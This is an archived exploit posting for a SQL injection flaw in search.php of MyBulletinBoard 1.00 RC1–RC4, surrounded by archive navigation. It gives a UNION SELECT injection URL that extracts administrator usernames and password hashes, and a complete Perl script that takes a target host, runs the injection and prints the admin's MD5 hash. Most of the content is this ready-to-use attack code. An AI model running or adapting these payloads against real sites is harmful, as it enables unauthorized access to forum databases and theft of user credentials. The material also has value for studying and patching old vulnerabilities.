mybbSQLinject.txt

mybbSQLinject.txt: Posted Aug 24, 2005; Authored by Devil-00; MyBulletinBoard (MyBB) versions 1.00 RC1 through RC4 suffer from SQL injection flaws. Perl exploit included.; tags | exploit, perl, sql injection; SHA-256 | fe2fc9ea1a9d3ca26e36ececae8ea5a4828ff84288af709d8aa6c453755cdd16; Download | Favorite | View

mybbSQLinject.txt

Hello

The Injected File : search.php
Discovered by: HACKERS PAL & Devil-00 & ABDUCTER

Injected Versions :-
Powered by MyBulletinBoard 1.00 Release Candidate 4
Powered by MyBulletinBoard 1.00 Release Candidate 3
Powered by MyBulletinBoard 1.00 Release Candidate 2
Powered by MyBulletinBoard 1.00 Release Candidate 1
And The Last Versions

The Code For The Vul:-

search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4/* 


The Exploit By Pirl :-
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
  print "#################[ MyBB SQL-Injection ]############################\n";
  print "#         Coded By Devil-00 [ sTranger-killer ]       #\n";
  print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID     #\n";
  print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
  print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ]        #\n";
  print "##################################################  #################\n";
  exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
  print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui  d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
  $page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
  $page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
  exit;  
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
  $page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
  $page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
  $page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}

-=-=-=-=-

Thanks For Devil-00 & ABDUCTER

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

mybbSQLinject.txt

mybbSQLinject.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mybbSQLinject.txt

Share This

mybbSQLinject.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems